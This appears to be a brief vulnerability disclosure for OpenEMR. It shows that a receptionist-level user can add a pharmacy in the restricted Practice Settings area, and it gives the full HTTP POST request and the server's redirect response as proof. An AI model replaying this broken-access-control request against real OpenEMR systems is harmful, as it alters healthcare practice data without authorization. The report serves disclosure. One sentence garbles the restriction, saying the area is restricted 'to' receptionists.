We observed that a receptionist user
can add a Pharmacy
in the Pratice Settings
section, although this area is restricted to receptionist users
.
REQUEST:
POST /openemr/controller.php?practice_settings&pharmacy&action=edit HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=<receptionist user's cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/controller.php?practice_settings&pharmacy&action=edit
form_id=&name=test_pharmarcy&address_line1=11&address_line2=11&city=&state=&zip=&email=&phone=&fax=&npi=&ncpdp=&transmit_method=1&id=&process=true
RESPONSE:
HTTP/1.1 302 Found
Server: nginx/1.21.1
Date: Mon, 26 Dec 2022 09:02:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /openemr/controller.php?practice_settings&pharmacy&action=list
Content-Length: 9246
<!DOCTYPE html>
<html>
<head>
<title>Practice Settings</title>
<meta charset="utf-8" />
...
After we send the request above
there is a new pharmacy added